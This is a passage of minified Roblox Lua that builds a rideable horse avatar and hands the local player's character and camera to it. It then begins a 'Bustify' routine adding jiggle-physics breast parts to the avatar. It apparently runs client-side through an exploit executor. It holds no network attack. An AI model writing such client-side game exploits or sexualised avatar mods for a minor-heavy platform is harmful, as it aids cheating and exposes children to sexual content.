alse;UnionOperation1.brickColor=BrickColor.new("Black")UnionOperation2.Name="Ears"UnionOperation2.Parent=Model0;UnionOperation2.CFrame=CFrame.new(-49.9946136,5.98617172,19.539629,-5.19995531e-08,2.70967213e-08,1,0.965924025,0.258818507,4.32144844e-08,-0.258818507,0.965924025,-3.96318924e-08)UnionOperation2.Orientation=Vector3.new(0,90,75)UnionOperation2.Position=Character.Torso.Position;UnionOperation2.Rotation=Vector3.new(75,90,0)UnionOperation2.Color=Color3.new(0.105882,0.164706,0.207843)UnionOperation2.Size=Vector3.new(1.40000141,1.19999993,1)UnionOperation2.BrickColor=BrickColor.new("Black")UnionOperation2.CanCollide=false;UnionOperation2.brickColor=BrickColor.new("Black")UnionOperation3.Name="Head"UnionOperation3.Parent=Model0;UnionOperation3.CFrame=CFrame.new(-49.9946136,5.61092854,18.9154816,3.96033739e-09,9.83023352e-09,1,0.965924799,0.258819014,-6.36964037e-09,-0.258819014,0.965924799,-8.47027959e-09)UnionOperation3.Orientation=Vector3.new(0,90,75)UnionOperation3.Position=Character.Torso.Position;UnionOperation3.Rotation=Vector3.new(75,90,0)UnionOperation3.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation3.Size=Vector3.new(1.0018127,2.39992595,1.00000024)UnionOperation3.BrickColor=BrickColor.new("Brown")UnionOperation3.brickColor=BrickColor.new("Brown")Motor6D4.Name="Bridle Joint"Motor6D4.Parent=UnionOperation3;Motor6D4.C0=CFrame.new(0,0.400000006,0,1,0,0,0,1,0,0,0,1)Motor6D4.C1=CFrame.new(0.080325596,0.34822306,1.69231318e-09,0.965925038,0.258818835,-5.56992563e-10,-0.258818835,0.965925038,-4.23081659e-09,-5.56986124e-10,4.23078284e-09,1)Motor6D4.Part0=UnionOperation3;Motor6D4.Part1=UnionOperation1;Motor6D4.part1=UnionOperation1;Motor6D5.Name="Ear Joint"Motor6D5.Parent=UnionOperation3;Motor6D5.C0=CFrame.new(0,0.800000012,0,1,0,0,0,1,0,0,0,1)Motor6D5.C1=CFrame.new(-0.200916082,0.0999985337,-1.38131968e-08,0.999999106,2.68220901e-07,-5.59598909e-08,-2.68220901e-07,0.999999106,1.72664976e-08,5.59598661e-08,-1.72664958e-08,1)Motor6D5.Part0=UnionOperation3;Motor6D5.Part1=UnionOperation2;Motor6D5.part1=UnionOperation2;UnionOperation6.Name="Tail"UnionOperation6.Parent=Model0;UnionOperation6.CFrame=CFrame.new(-49.9946136,2.63727212,24.0214939,1,0,0,0,1,0,0,0,1)UnionOperation6.Position=Character.Torso.Position;UnionOperation6.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation6.Size=Vector3.new(0.600000203,3.14548206,1.8539381)UnionOperation6.BrickColor=BrickColor.new("Brown")UnionOperation6.CanCollide=false;UnionOperation6.brickColor=BrickColor.new("Brown")UnionOperation7.Name="Right Arm"UnionOperation7.Parent=Model0;UnionOperation7.CFrame=CFrame.new(-49.1821136,1.71001315,20.594492,1,0,0,0,1,0,0,0,1)UnionOperation7.Position=Character.Torso.Position;UnionOperation7.Color=Color3.new(0.105882,0.164706,0.207843)UnionOperation7.Size=Vector3.new(1.02501225,3.40000153,1)UnionOperation7.BrickColor=BrickColor.new("Black")UnionOperation7.CanCollide=false;UnionOperation7.brickColor=BrickColor.new("Black")UnionOperation8.Name="Right Leg"UnionOperation8.Parent=Model0;UnionOperation8.CFrame=CFrame.new(-49.2771149,1.81001318,23.3945408,1,0,0,0,1,0,0,0,1)UnionOperation8.Position=Character.Torso.Position;UnionOperation8.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation8.Size=Vector3.new(1.21500862,3.60000014,1)UnionOperation8.BrickColor=BrickColor.new("Brown")UnionOperation8.CanCollide=false;UnionOperation8.brickColor=BrickColor.new("Brown")UnionOperation9.Name="Torso"UnionOperation9.Parent=Model0;UnionOperation9.CFrame=CFrame.new(-49.9946136,4.38101387,20.2431183,0,0,1,0.258818954,-0.965925574,0,0.965925574,0.258818954,0)UnionOperation9.Orientation=Vector3.new(0,90,165)UnionOperation9.Position=Character.Torso.Position;UnionOperation9.Rotation=Vector3.new(165,90,0)UnionOperation9.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation9.Size=Vector3.new(1.82508302,3.42743158,1.00000012)UnionOperation9.BrickColor=BrickColor.new("Brown")UnionOperation9.brickColor=BrickColor.new("Brown")Motor6D10.Name="Neck"Motor6D10.Parent=UnionOperation9;Motor6D10.C0=CFrame.new(-0.300000012,-1.20000005,0,1,0,0,0,1,0,0,0,1)Motor6D10.C1=CFrame.new(-0.331624597,0.664073646,-1.80332327e-09,-2.38418579e-07,-0.999999285,3.96033739e-09,0.999999285,-2.38418579e-07,9.83023352e-09,-9.83024862e-09,3.96033162e-09,1)Motor6D10.Part0=UnionOperation9;Motor6D10.Part1=UnionOperation3;Motor6D10.part1=UnionOperation3;UnionOperation11.Name="Left Leg"UnionOperation11.Parent=Model0;UnionOperation11.CFrame=CFrame.new(-50.7121429,1.81001318,23.3945408,1,0,0,0,1,0,0,0,1)UnionOperation11.Position=Character.Torso.Position;UnionOperation11.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation11.Size=Vector3.new(1.21491718,3.60000014,1)UnionOperation11.BrickColor=BrickColor.new("Brown")UnionOperation11.CanCollide=false;UnionOperation11.brickColor=BrickColor.new("Brown")UnionOperation12.Name="Body"UnionOperation12.Parent=Model0;UnionOperation12.CFrame=CFrame.new(-49.9946136,3.11006212,21.9945164,1,0,0,0,1,0,0,0,1)UnionOperation12.Position=Character.Torso.Position;UnionOperation12.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation12.Size=Vector3.new(2.20000029,2.20009971,4.60001278)UnionOperation12.BrickColor=BrickColor.new("Brown")UnionOperation12.brickColor=BrickColor.new("Brown")Motor6D13.Name="Upper Spine"Motor6D13.Parent=UnionOperation12;Motor6D13.C0=CFrame.new(0,0,-1.39999998,1,0,0,0,1,0,0,0,1)Motor6D13.C1=CFrame.new(0.0104781389,1.3185941,0,0,0.258818954,0.965925574,0,-0.965925574,0.258818954,1,0,0)Motor6D13.Part0=UnionOperation12;Motor6D13.Part1=UnionOperation9;Motor6D13.part1=UnionOperation9;Motor6D14.Name="Lower Spine"Motor6D14.Parent=UnionOperation12;Motor6D14.C0=CFrame.new(0,0.900000036,1.5999999,1,0,0,0,1,0,0,0,1)Motor6D14.C1=CFrame.new(0,1.37278998,-0.426977575,1,0,0,0,1,0,0,0,1)Motor6D14.Part0=UnionOperation12;Motor6D14.Part1=UnionOperation6;Motor6D14.part1=UnionOperation6;Motor6D15.Name="Saddle Joint"Motor6D15.Parent=UnionOperation12;Motor6D15.C1=CFrame.new(0,-0.364952087,-0.141479492,1,0,0,0,1,0,0,0,1)Motor6D15.Part0=UnionOperation12;Motor6D15.Part1=UnionOperation23;Motor6D15.part1=UnionOperation23;Motor6D16.Name="Right Hip"Motor6D16.Parent=UnionOperation12;Motor6D16.C0=CFrame.new(0.800000012,0,1.39999998,1,0,0,0,1,0,0,0,1)Motor6D16.C1=CFrame.new(0.0825012326,1.30004895,-2.44379044e-05,1,0,0,0,1,0,0,0,1)Motor6D16.Part0=UnionOperation12;Motor6D16.Part1=UnionOperation8;Motor6D16.part1=UnionOperation8;Motor6D17.Name="Left Hip"Motor6D17.Parent=UnionOperation12;Motor6D17.C0=CFrame.new(-0.800000012,0,1.39999998,1,0,0,0,1,0,0,0,1)Motor6D17.C1=CFrame.new(-0.082470715,1.30004895,-2.44379044e-05,1,0,0,0,1,0,0,0,1)Motor6D17.Part0=UnionOperation12;Motor6D17.Part1=UnionOperation11;Motor6D17.part1=UnionOperation11;Motor6D18.Name="Left Shoulder"Motor6D18.Parent=UnionOperation12;Motor6D18.C0=CFrame.new(-0.800000012,0,-1.39999998,1,0,0,0,1,0,0,0,1)Motor6D18.C1=CFrame.new(0.0124999881,1.40004897,2.44379044e-05,1,0,0,0,1,0,0,0,1)Motor6D18.Part0=UnionOperation12;Motor6D18.Part1=UnionOperation20;Motor6D18.part1=UnionOperation20;Motor6D19.Name="Right Shoulder"Motor6D19.Parent=UnionOperation12;Motor6D19.C0=CFrame.new(0.800000012,0,-1.39999998,1,0,0,0,1,0,0,0,1)Motor6D19.C1=CFrame.new(-0.0124999881,1.40004897,2.44379044e-05,1,0,0,0,1,0,0,0,1)Motor6D19.Part0=UnionOperation12;Motor6D19.Part1=UnionOperation7;Motor6D19.part1=UnionOperation7;UnionOperation20.Name="Left Arm"UnionOperation20.Parent=Model0;UnionOperation20.CFrame=CFrame.new(-50.8071136,1.71001315,20.594492,1,0,0,0,1,0,0,0,1)UnionOperation20.Position=Character.Torso.Position;UnionOperation20.Color=Color3.new(0.105882,0.164706,0.207843)UnionOperation20.Size=Vector3.new(1.02501237,3.40000153,1.00000012)UnionOperation20.BrickColor=BrickColor.new("Black")UnionOperation20.CanCollide=false;UnionOperation20.brickColor=BrickColor.new("Black")UnionOperation21.Name="HumanoidRootPart"UnionOperation21.Parent=Model0;UnionOperation21.CFrame=CFrame.new(-49.9946136,4.71006203,21.9945164,1,0,0,0,1,0,0,0,1)UnionOperation21.Position=Character.Torso.Position;UnionOperation21.Color=Color3.new(0.486275,0.360784,0.27451)UnionOperation21.Transparency=1;UnionOperation21.Size=Vector3.new(2.20000029,2.20009971,4.60001278)UnionOperation21.BrickColor=BrickColor.new("Brown")UnionOperation21.CanCollide=false;UnionOperation21.brickColor=BrickColor.new("Brown")Motor6D22.Name="Root Joint"Motor6D22.Parent=UnionOperation21;Motor6D22.C0=CFrame.new(0,-1.60000002,0,1,0,0,0,1,0,0,0,1)Motor6D22.Part0=UnionOperation21;Motor6D22.Part1=UnionOperation12;Motor6D22.part1=UnionOperation12;UnionOperation23.Name="Saddle"UnionOperation23.Parent=Model0;UnionOperation23.CFrame=CFrame.new(-49.9946136,3.47501421,22.1359959,1,0,0,0,1,0,0,0,1)UnionOperation23.Position=Character.Torso.Position;UnionOperation23.Color=Color3.new(0.423529,0.345098,0.294118)UnionOperation23.Size=Vector3.new(2.04000044,2.67000055,2.08303714)UnionOperation23.BrickColor=BrickColor.new("Pine Cone")UnionOperation23.CanCollide=false;UnionOperation23.brickColor=BrickColor.new("Pine Cone")Motor6D24.Name="Saddle Joint"Motor6D24.Parent=UnionOperation23;Motor6D24.C0=CFrame.new(0,0.400000006,0,1,0,0,0,1,0,0,0,1)Motor6D24.C1=CFrame.new(-7.62939453e-06,-0.199998945,0.000480651855,1,0,0,0,1,0,0,0,1)Motor6D24.Part0=UnionOperation23;Motor6D24.Part1=Seat25;Motor6D24.part1=Seat25;Seat25.Parent=Model0;Seat25.CFrame=CFrame.new(-49.994606,4.07501316,22.1355152,1,0,0,0,1,0,0,0,1)Seat25.Position=Character.Torso.Position;Seat25.Color=Color3.new(0.105882,0.164706,0.207843)Seat25.Transparency=1;Seat25.Size=Vector3.new(1.20000005,0.200000003,2)Seat25.BottomSurface=Enum.SurfaceType.Smooth;Seat25.BrickColor=BrickColor.new("Black")Seat25.CanCollide=false;Seat25.TopSurface=Enum.SurfaceType.Smooth;Seat25.brickColor=BrickColor.new("Black")Seat25.FormFactor=Enum.FormFactor.Custom;Seat25.formFactor=Enum.FormFactor.Custom;Humanoid26.Parent=Model0;Humanoid26.LeftLeg=UnionOperation11;Humanoid26.NameOcclusion=Enum.NameOcclusion.NoOcclusion;Humanoid26.RightLeg=UnionOperation8;Humanoid26.Torso=UnionOperation21;Humanoid26.WalkSpeed=20;Folder27.Name="Animations"Folder27.Parent=Model0;Animation28.Name="Walk"Animation28.Parent=Folder27;Animation28.AnimationId="rbxassetid://289443727"Animation29.Name="Ride"Animation29.Parent=Folder27;Animation29.AnimationId="rbxassetid://289454972"Animation30.Name="Jump"Animation30.Parent=Folder27;Animation30.AnimationId="rbxassetid://289877829"Animation31.Name="Fall"Animation31.Parent=Folder27;Animation31.AnimationId="rbxassetid://289878116"Folder32.Name="Scripts"Folder32.Parent=Model0;Script33.Name="AnimateScript"Script33.Parent=Folder32;table.insert(cors,sandbox(Script33,function()local a7=script.Parent.Parent;local a8=a7:WaitForChild("Humanoid")local a9={}for T,aa in pairs(a7:WaitForChild("Animations"):GetChildren())do a9[aa.Name]=a8:LoadAnimation(aa)end;local ab="None"local function ac()local ray=Ray.new(a7.HumanoidRootPart.Position+Vector3.new(0,-4.3,0),Vector3.new(0,-1,0))local hit,ad=game:GetService("Workspace"):FindPartOnRay(ray,a7)if hit and hit.CanCollide then return true else return false end end;local function ae()for T,aa in pairs(a9)do aa:Stop()end end;local function af(ag)if ab~=ag then ae()ab=ag;if a9[ab]then a9[ab]:Play()end end end;while true do game:GetService("RunService").Stepped:wait()if a8.Health>0 then if ac()then local speed=Vector3.new(a7.HumanoidRootPart.Velocity.X,0,a7.HumanoidRootPart.Velocity.Z).magnitude;if speed>1 then af("Walk")else af("Idle")end else local ah=a7.HumanoidRootPart.Velocity.Y;if ah>0 then af("Jump")else af("Fall")end end else af("Dead")end end end))Script34.Name="ControlScript"Script34.Parent=Folder32;table.insert(cors,sandbox(Script34,function()local a7=script.Parent.Parent;local a8=a7:WaitForChild("Humanoid")local seat=a7:WaitForChild("Seat")local ai=seat.Occupant;script.Parent.Parent.Seat.Changed:connect(function(aj)if seat.Occupant~=ai then ai=seat.Occupant;if ai then local player=game:GetService("Players"):GetPlayerFromCharacter(ai.Parent)if player then local ak=script.LocalControlScript:Clone()ak.Horse.Value=a7;ak.Parent=player.PlayerGui;ak.Disabled=false end end end end)end))LocalScript35.Name="LocalControlScript"LocalScript35.Parent=Script34;table.insert(cors,sandbox(LocalScript35,function()local al=game:GetService("UserInputService")local player=game:GetService("Players").LocalPlayer;local a7=player.Character;local a8=a7.Humanoid;local am=script:WaitForChild("Horse").Value;local an=script:WaitForChild("HorseGui")an.Parent=player.PlayerGui;a8:SetStateEnabled(Enum.HumanoidStateType.Jumping,true)local ao=a8:LoadAnimation(am.Animations.Ride)ao:Play()local ap=Vector3.new(0,0,0)al.InputBegan:connect(function(aq,ar)if not ar then if aq.KeyCode==Enum.KeyCode.W or aq.KeyCode==Enum.KeyCode.Up then ap=Vector3.new(ap.X,ap.Y,-1)elseif aq.KeyCode==Enum.KeyCode.S or aq.KeyCode==Enum.KeyCode.Down then ap=Vector3.new(ap.X,ap.Y,1)elseif aq.KeyCode==Enum.KeyCode.A or aq.KeyCode==Enum.KeyCode.Left then ap=Vector3.new(-1,ap.Y,ap.Z)elseif aq.KeyCode==Enum.KeyCode.D or aq.KeyCode==Enum.KeyCode.Right then ap=Vector3.new(1,ap.Y,ap.Z)elseif aq.KeyCode==Enum.KeyCode.Space then local ray=Ray.new(am.HumanoidRootPart.Position+Vector3.new(0,-4.3,0),Vector3.new(0,-1,0))local hit,ad=game:GetService("Workspace"):FindPartOnRay(ray,am)if hit and hit.CanCollide then am.Humanoid:ChangeState(Enum.HumanoidStateType.Jumping)end elseif aq.KeyCode==Enum.KeyCode.LeftShift then a8:ChangeState(Enum.HumanoidStateType.Jumping)end end end)al.InputEnded:connect(function(aq,ar)if not ar then if aq.KeyCode==Enum.KeyCode.W or aq.KeyCode==Enum.KeyCode.Up then if ap.Z<0 then ap=Vector3.new(ap.X,ap.Y,0)end elseif aq.KeyCode==Enum.KeyCode.S or aq.KeyCode==Enum.KeyCode.Down then if ap.Z>0 then ap=Vector3.new(ap.X,ap.Y,0)end elseif aq.KeyCode==Enum.KeyCode.A or aq.KeyCode==Enum.KeyCode.Left then if ap.X<0 then ap=Vector3.new(0,ap.Y,ap.Z)end elseif aq.KeyCode==Enum.KeyCode.D or aq.KeyCode==Enum.KeyCode.Right then if ap.X>0 then ap=Vector3.new(0,ap.Y,ap.Z)end end end end)spawn(function()while am.Seat.Occupant==a8 do game:GetService("RunService").RenderStepped:wait()am.Humanoid:Move(ap,true)end;an:Destroy()a8:SetStateEnabled(Enum.HumanoidStateType.Jumping,true)am.Humanoid:Move(Vector3.new())ao:Stop()script:Destroy()end)end))LocalScript35.Disabled=true;ObjectValue36.Name="Horse"ObjectValue36.Parent=LocalScript35;ScreenGui37.Name="HorseGui"ScreenGui37.Parent=LocalScript35;for T,v in pairs(mas:GetChildren())do v.Parent=workspace;pcall(function()v:MakeJoints()end)end;mas:Destroy()for T,v in pairs(cors)do spawn(function()pcall(v)end)end;W(R.horsebody.Handle,game:GetService("Workspace").Horse.Body)W(R.horsehead.Handle,game:GetService("Workspace").Horse.Head)W(S.horseeye.Handle,game:GetService("Workspace").Horse.Head)W(S.horseeye2.Handle,game:GetService("Workspace").Horse.Head)W(R.horseneck.Handle,game:GetService("Workspace").Horse.Torso)W(R.horserightarm.Handle,game:GetService("Workspace").Horse["Right Arm"])W(R.horseleftarm.Handle,game:GetService("Workspace").Horse["Left Arm"])W(R.horserightleg.Handle,game:GetService("Workspace").Horse["Right Leg"])W(R.horseleftleg.Handle,game:GetService("Workspace").Horse["Left Leg"])W(R.horsetail.Handle,game:GetService("Workspace").Horse.Tail)R.horsebody.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.horsehead.Handle.Attachment.Rotation=Vector3.new(90,0,0)S.horseeye.Handle.Attachment.Rotation=Vector3.new(0,180,0)S.horseeye2.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.horseneck.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.horserightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.horseleftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.horserightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.horseleftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.horsetail.Handle.Attachment.Rotation=Vector3.new(90,0,0)game:GetService("Workspace").Horse:WaitForChild("Right Arm"):FindFirstChild("Attachment").Name="Attachment1"game:GetService("Workspace").Horse:WaitForChild("Left Arm"):FindFirstChild("Attachment").Name="Attachment2"game:GetService("Workspace").Horse:WaitForChild("Right Leg"):FindFirstChild("Attachment").Name="Attachment1"game:GetService("Workspace").Horse:WaitForChild("Left Leg"):FindFirstChild("Attachment").Name="Attachment2"game:GetService("Workspace").Horse:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment2"game:GetService("Workspace").Horse:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment69"game:GetService("Workspace").Horse:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment420"game:GetService("Workspace").Horse:WaitForChild("Body"):FindFirstChild("Attachment").Name="Attachment2"game:GetService("Workspace").Horse:WaitForChild("Right Arm").Attachment1.Position=Vector3.new(0,-0.7,0)game:GetService("Workspace").Horse:WaitForChild("Left Arm").Attachment2.Position=Vector3.new(0,-0.7,0)game:GetService("Workspace").Horse:WaitForChild("Right Leg").Attachment1.Position=Vector3.new(0,-0.8,0)game:GetService("Workspace").Horse:WaitForChild("Left Leg").Attachment2.Position=Vector3.new(0,-0.8,0)game:GetService("Workspace").Horse:WaitForChild("Head").Attachment2.Position=Vector3.new(-0.1,0.465,0)game:GetService("Workspace").Horse:WaitForChild("Head").Attachment69.Position=Vector3.new(0,1,0.575)game:GetService("Workspace").Horse:WaitForChild("Head").Attachment420.Position=Vector3.new(0,1,-0.575)game:GetService("Workspace").Horse:WaitForChild("Body").Attachment2.Position=Vector3.new(0,-0.1,0)coroutine.resume(coroutine.create(function()while On do game:GetService("RunService").Heartbeat:wait()M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)end end))function dieded()game:GetService("Workspace").Horse:Remove()game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;Character:Remove()end;M.Humanoid.Died:Connect(dieded)game:GetService("Workspace").Horse.Humanoid.Died:Connect(dieded)game:GetService("Players").LocalPlayer.Character=game:GetService("Workspace").Horse;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;Model0.Name="Horse"M.Humanoid.HipHeight=1.5;game:GetService("Workspace").Horse.Humanoid.DisplayDistanceType=Enum.HumanoidDisplayDistanceType.None;game:GetService("Workspace").Horse.Humanoid.HealthDisplayType=Enum.HumanoidHealthDisplayType.AlwaysOff;game["Run Service"].Stepped:connect(function()M.Torso.CanCollide=bloop;M.Head.CanCollide=bloop;game:GetService("Workspace").Horse.Body.CanCollide=bloopy;game:GetService("Workspace").Horse.Torso.CanCollide=bloopy;game:GetService("Workspace").Horse.Head.CanCollide=bloopy end)end)end;function Clickey2()pcall(function()Player=game:GetService("Players").LocalPlayer;Character=Player.Character;Humanoid=Character:WaitForChild("Humanoid")local as=nil;if Character.Humanoid.RigType==Enum.HumanoidRigType.R6 then as=Character.Torso end;if Character.Humanoid.RigType==Enum.HumanoidRigType.R15 then as=Character.UpperTorso end;function sandbox(a3,a4)local a5=getfenv(a4)local a6=setmetatable({},{__index=function(self,O)if O=="script"then return a3 else return a5[O]end end})setfenv(a4,a6)return a4 end;cors={}mas=Instance.new("Model",game:GetService("Lighting"))Script0=Instance.new("Script")Model1=Instance.new("Model")Part2=Instance.new("Part")SpecialMesh3=Instance.new("SpecialMesh")Part4=Instance.new("Part")Part5=Instance.new("Part")Part6=Instance.new("Part")Script7=Instance.new("Script")StringValue8=Instance.new("StringValue")BlockMesh9=Instance.new("BlockMesh")Weld10=Instance.new("Weld")Script0.Name="MainMorphScript"Script0.Parent=mas;table.insert(cors,sandbox(Script0,function()AllowedAttachments={"FaceCenterAttachment","FaceFrontAttachment","HairAttachment","HatAttachment","BodyFrontAttachment","NeckAttachment"}ColorList={{"Br. yellowish green","Shamrock"},{"Bright yellow","Bronze"},{"Bright orange","CGA brown"},{"Bright red","Maroon"},{"Bright violet","Dark indigo"},{"Bright blue","Navy blue"},{"Bright bluish green","Black"},{"Bright green","Parsley green"},{"Institutional white","Mid gray"},{"White","Ghost grey"},{"Light stone grey","Medium stone grey"},{"Mid gray","Fossil"},{"Medium stone grey","Dark stone grey"},{"Dark stone grey","Black"},{"Black","Really black"},{"Really black","Black"},{"Grime","Slime green"},{"Br. yellowish orange","Neon orange"},{"Light orange","Medium red"},{"Sand red","Copper"},{"Lavender","Bright violet"},{"Sand blue","Smoky grey"},{"Medium blue","Storm blue"},{"Sand green","Slime green"},{"Brick yellow","Fawn brown"},{"Cool yellow","Burlap"},{"Neon orange","CGA brown"},{"Medium red","Tawny"},{"Light reddish violet","Sunrise"},{"Pastel Blue","Sand blue"},{"Teal","Bright bluish green"},{"Medium green","Grime"},{"Pastel brown","Salmon"},{"Pastel yellow","Cashmere"},{"Pastel orange","Mauve"},{"Pink","Magenta"},{"Pastel violet","Alder"},{"Pastel light blue","Cyan"},{"Pastel blue-green","Teal"},{"Pastel green","Medium green"},{"Olive","Shamrock"},{"New Yeller","Gold"},{"Deep orange","CGA brown"},{"Really red","Maroon"},{"Hot pink","Eggplant"},{"Really blue","Navy blue"},{"Toothpaste","Bright bluish green"},{"Lime green","Forest green"},{"Brown","Dirt brown"},{"Nougat","Tawny"},{"Dark orange","Dusy Rose"},{"Royal purple","Dark indigo"},{"Alder","Bright violet"},{"Cyan","Bright blue"},{"Light blue","Sand blue"},{"Camo","Earth green"},{"Reddish brown","Cocoa"},{"CGA brown","Maroon"},{"Dusty Rose","Cocoa"},{"Magenta","Bright violet"},{"Deep blue","Navy blue"},{"Navy blue","Black"},{"Dark green","Earth green"},{"Earth green","Black"}}function Color(at,au)local av=au;local aw=nil;for T=1,#ColorList do if av==BrickColor.new(ColorList[T][1])then aw=BrickColor.new(ColorList[T][2])end end;for ax,c in pairs(at:GetChildren())do if c:IsA("BasePart")and c.Name=="Skin1"then c.BrickColor=av end;if c:IsA("BasePart")and c.Name=="Skin2"then c.BrickColor=aw end end end;function Weld(at,ay)for T,c in pairs(at:GetChildren())do if c:IsA("BasePart")then c.CanCollide=false;c.Anchored=false;if c.Name~=ay.Name then local az=Instance.new("ManualWeld")az.Part0=ay;az.Part1=c;az.C0=CFrame.new()az.C1=c.CFrame:inverse()*ay.CFrame;az.Parent=ay;c.CustomPhysicalProperties=PhysicalProperties.new(0,0,0,0,0)end end end end;function WeldSingle(aA,Part2)if aA:IsA("BasePart")then aA.CanCollide=false;aA.Anchored=false;if aA~=Part2 then local az=Instance.new("ManualWeld")az.Part0=Part2;az.Part1=aA;az.C0=CFrame.new(0,0,0)az.C1=CFrame.new(0,0,0)az.Parent=Part2 end end end;function Bustify(Character)local Player=game:GetService("Players"):GetPlayerFromCharacter(Character)if Character:FindFirstChild("Bust")then Character.Bust:Destroy()end;local aB=Character:FindFirstChild("Body Colors")local au=aB.HeadColor;aB.TorsoColor=au;local Torso=as;local aC=game:GetService("Workspace").Tiddie;local at=Instance.new("Model")at.Name="Bust"at.Parent=Character;local aD=1;local aE=100;local aF=1;local aG=1.5;local aH=Instance.new("Part")aH.Name="Right"aH.Anchored=true;aH.CanCollide=false;aH.CustomPhysicalProperties=PhysicalProperties.new(0,0,0,0,0)aH.Size=Vector3.new(1,1,1)aH.Shape=Enum.PartType.Ball;aH.Transparency=1;aH.Parent=at;aH.TopSurface=Enum.SurfaceType.Smooth;aH.BottomSurface=Enum.SurfaceType.Smooth;aH.BrickColor=au;local aI=Instance.new("BodyForce")aI.Force=Vector3.new(0,1,0)aH.Parent=at;local aJ=Instance.new("Part")aJ.Name="Left"aJ.Anchored=true;aJ.CanCollide=false;aJ.CustomPhysicalProperties=PhysicalProperties.new(0,0,0,0,0)aJ.Size=Vector3.new(1,1,1)aJ.Shape=Enum.PartType.Ball;aJ.Transparency=1;aJ.TopSurface=Enum.SurfaceType.Smooth;aJ.BottomSurface=Enum.SurfaceType.Smooth;local aK=Instance.new("BodyForce")aK.Force=Vector3.new(0,1,0)aK.Parent=aJ;aJ.Parent=at;aH.Position=Torso.Position;aJ.Position=Torso.Position;local aL=Instance.new("Attachment")aL.Parent=Torso;aL.Name="Hinge_R"aL.Position=Vector3.new(0.375,0.25,-0.5)aL.Rotation=Vector3.new(0,135,0)aL.Axis=Vector3.new(0,0,-1)aL.SecondaryAxis=Vector3.new(0,1,0)local aM=Instance.new("Attachment")aM.Parent=Torso;aM.Name="Hinge_L"aM.Position=Vector3.new(-0.25,0.25,-0.5)aM.Rotation=Vector3.new(0,45,0)aM.Axis=Vector3.new(0,0,-1)aM.SecondaryAxis=Vector3.new(0,1,0)local aN=Instance.new("Attachment")aN.Parent=Torso;aN.Name="Jiggle_R"aN.Position=Vector3.new(1.25,0.875,-0.375)aN.Rotation=Vector3.new(0,90,0)aN.Axis=Vector3.new(0,0,-1)aN.SecondaryAxis=Vector3.new(0,1,0)local aO=Instance.new("Attachment")aO.Parent=Torso;aO.Name="Jiggle_L"aO.Position=Vector3.new(-1.25,0.875,-0.375)aO.Rotation=Vector3.new(0,90,0)aO.Axis=Vector3.new(0,0,-1)aO.SecondaryAxis=Vector3.new(0,1,0)local aP=Instance.new("Attachment")aP.Parent=Torso;aP.Name="Jiggle_M"aP.Position=Vector3.new(0,0.875,-0.5)aP.Rotation=Vector3.new(0,90,0)aP.Axis=Vector3.new(0,0,-1)aP.SecondaryAxis=Vector3.new(0,1,0)local aQ=Instance.new("Attachment")aQ.Parent=aH;aQ.Name="Jiggle1"aQ.Position=Vector3.new(1,0.25,-.5)aQ.Rotation=Vector3.new(0,90,0)aQ.Axis=Vector3.new(0,0,-1)aQ.SecondaryAxis=Vector3.new(0,1,0)local aR=Instance.new("Attachment")aR.Parent=aJ;aR.Name="Jiggle1"aR.Position=Vector3.new(-1,0.25,-.5)aR.Rotation=Vector3.new(0,90,0)aR.Axis=Vector3.new(0,0,-1)aR.SecondaryAxis=Vector3.new(0,1,0)local aS=Instance.new("Attachment")aS.Parent=aH;aS.Name="Jiggle2"aS.Position=Vector3.new(-1,0.25,-.5)aS.Rotation=Vector3.new(0,90,0)aS.Axis=Vector3.new(0,0,-1)aS.SecondaryAxis=Vector3.new(0,1,0)local aT=Instance.new("Attachment")aT.Parent=aJ;aT.Name="Jiggle2"aT.Position=Vector3.new(1,0.25,-.5)aT.Rotation=Vector3.new(0,90,0)aT.Axis=Vector3.new(0,0,-1)aT.SecondaryAxis=Vector3.new(0,1,0)local aU=Instance.new("Attachment")aU.Parent=aH;aU.Name="Hinge"aU.Position=Vector3.new(0,0,0.375)aU.Rotation=Vector3.new(0,78.75,0)aU.Axis=Vector3.new(0,0,-1)aU.SecondaryAxis=Vector3.new(0,1,0)local aV=Instance.new("Attachment")aV.Parent=aJ;aV.Name="Hinge"aV.Position=Vector3.new(0,0,0.375)aV.Rotation=Vector3.new(-180,78.75,-180)aV.Axis=Vector3.new(0,0,-1)aV.SecondaryAxis=Vector3.new(0,1,0)local aW=Instance.new("BallSocketConstraint")aW.Parent=Torso;aW.Name="Socket_R"aW.LimitsEnabled=true;aW.Attachment0=aL;aW.Attachment1=aU;local aX=Instance.new("BallSocketConstraint")aX.Parent=Torso;aX.Name="Socket_L"aX.LimitsEnabled=true;aX.Attachment0=aM;aX.Attachment1=aV;local aY=Instance.new("SpringConstraint")aY.Parent=Torso;aY.Name="Spring_R"aY.Damping=5;aY.FreeLength=1.25;aY.Stiffness=aE;aY.Attachment0=aN;aY.Attachment1=aQ;local 